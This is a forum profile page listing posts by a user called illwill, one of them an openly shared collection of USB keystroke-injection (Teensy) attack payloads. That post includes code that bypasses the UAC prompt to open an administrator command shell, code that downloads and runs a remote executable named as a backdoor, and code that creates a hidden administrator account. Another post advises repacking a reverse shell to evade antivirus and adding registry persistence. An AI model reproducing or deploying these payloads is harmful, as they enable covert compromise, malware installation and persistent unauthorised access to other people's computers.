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Everything posted by illwill

  1. Violation of CoC
  2. Violation of CoC
  3. Violation of CoC
  4. I made the reverse shell like 9 years ago it was packed using MEW so alot of AVs detected it because of that. if you want to use a different packer and add some changes to have it add itself to the registry for persistence, the source can be found here https://github.com/xillwillx/MiniReverse_Shell_With_Parameters
  5. i made the reverse exe like 7 yrs ago im pretty sure every av detects it
  6. I've been doing the same thing http://www.toolcrypt.org/tools/dbgtool/index.html using this instead of the python script ive been running into the same kind of issues, the code compiles ok but i dont htink the teensy's memmory can handle that much text at ones, trying to figure out a loop for it to take chunks of the debug script at a time
  7. Get CMD prompt with Admin Privs (Tested on Win7 only) void GetAdminCMD(){ Keyboard.set_modifier(MODIFIERKEY_GUI); // set windows key Keyboard.send_now(); // press windows key Keyboard.set_modifier(0); // release windows key Keyboard.send_now(); delay(50); Keyboard.print("cmd"); // send cmd to run box Keyboard.set_modifier(MODIFIERKEY_CTRL|MODIFIERKEY_SHIFT); // hold ctrl+alt Keyboard.set_key1(KEY_ENTER); // press enter key Keyboard.send_now(); Keyboard.set_modifier(0); //release keys Keyboard.set_key1(0); Keyboard.send_now(); delay(1000); // delay to wait for UAC prompt Keyboard.set_modifier(MODIFIERKEY_ALT); // set ALT key Keyboard.set_key1(KEY_Y); // set Y key Keyboard.send_now(); // send keys Keyboard.set_modifier(0); // release keys Keyboard.set_key1(0); Keyboard.send_now(); } XP Batchfile FTP Payload Keyboard.println("cd %appdata% && echo open FTPSITE.COM>ftp.tmp && echo username>> ftp.tmp && echo password>> ftp.tmp && echo cd public_html >> ftp.tmp && echo get logo.png >>ftp.tmp && echo quit >>ftp.tmp && FTP -v -i -s:ftp.tmp && echo hi>ftp.tmp && del ftp.tmp"); Windows7 Powershell FTP payload Keyboard.print("powershell"); delay(1500); Keyboard.println("$File = Join-Path $Env:APPDATA \"backdoor.exe\""); Keyboard.println("$ftp = \"ftp://username:password123@mysite.com/public_html/evil.exe\""); Keyboard.println("$webclient = New-Object System.Net.WebClient"); Keyboard.println("$uri = New-Object System.Uri($ftp)"); Keyboard.println("$webclient.DownloadFile($uri, $File)"); Keyboard.println("Invoke-Item $File"); Windows7 Powershell WebDL payload void WebDL(char *URL,char *FileName){ char buffer[175]; Keyboard.println("powershell"); delay(1500); sprintf(buffer, "$File = Join-Path $Env:APPDATA \"%s\"", FileName); Keyboard.println(buffer); Keyboard.println("$web = new-object System.Net.WebClient"); sprintf(buffer, "$web.DownloadFile(\"%s\", $File)", URL); Keyboard.println(buffer); Keyboard.println("Invoke-Item $File"); } Add an Admin user hidden from logon screen void GhostAdmin(char *UserName,char *Password){ char buffer[175]; sprintf(buffer, "net user %s %s /ADD", UserName, Password); Keyboard.println(buffer); delay(300); sprintf(buffer, "net localgroup administrators %s /add", UserName); Keyboard.println(buffer); delay(300); sprintf(buffer, "REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\" /v %s /d 0 /t REG_DWORD /f", UserName); Keyboard.println(buffer); }
  8. I did one about 6 yrs ago and mp3car.com was a great place to start i just recently went back to that site to check things out it's crazy how much better the equipment has gotten since then this is my old car setup, I since sold the car and im waiting to buy a new car this year to make my new project car http://www.whatsmypass.com/carputer/
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